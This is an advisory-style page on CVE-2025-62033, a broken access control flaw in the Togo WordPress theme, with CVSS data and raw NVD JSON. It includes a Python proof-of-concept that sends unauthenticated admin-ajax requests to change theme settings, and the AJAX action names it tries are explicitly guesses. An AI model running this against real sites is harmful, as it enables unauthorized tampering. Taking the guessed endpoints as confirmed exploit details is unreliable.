Security Vulnerability Report
中文
CVE-2025-62033 CVSS 6.5 MEDIUM

CVE-2025-62033

Published: 2025-11-06 16:16:09
Last Modified: 2026-04-27 17:16:30

Description

Missing Authorization vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Togo Theme < 1.0.4
Togo Theme from n/a through 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62033 PoC - Togo Theme Broken Access Control # Target: WordPress site using Togo theme < 1.0.4 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-62033 This PoC attempts to access admin-ajax.php endpoint with actions that should require authentication """ # Common Togo theme AJAX actions that may be vulnerable vulnerable_actions = [ "togo_save_settings", "togo_update_option", "togo_ajax_handler", "uxper_togo_save_data" ] for action in vulnerable_actions: payload = { "action": action, "nonce": "" # Intentionally empty to test unauthenticated access } try: response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=payload, timeout=10 ) # Check if response indicates successful unauthorized access # Response codes other than 403/401 may indicate vulnerability if response.status_code == 200: print(f"[+] Potential vulnerability found with action: {action}") print(f"[+] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def exploit_unauthorized_access(): """ Attempt to exploit the missing authorization vulnerability Modify theme settings or extract sensitive information """ exploit_data = { "action": "togo_save_settings", "settings_key": "togo_custom_config", "value": "malicious_value" } response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data, timeout=10 ) return response.status_code == 200 if __name__ == "__main__": print("CVE-2025-62033 Togo Theme PoC") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62033", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:09.470", "lastModified": "2026-04-27T17:16:30.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in uxper Togo togo.This issue affects Togo: from n/a through < 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/togo/vulnerability/wordpress-togo-theme-1-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}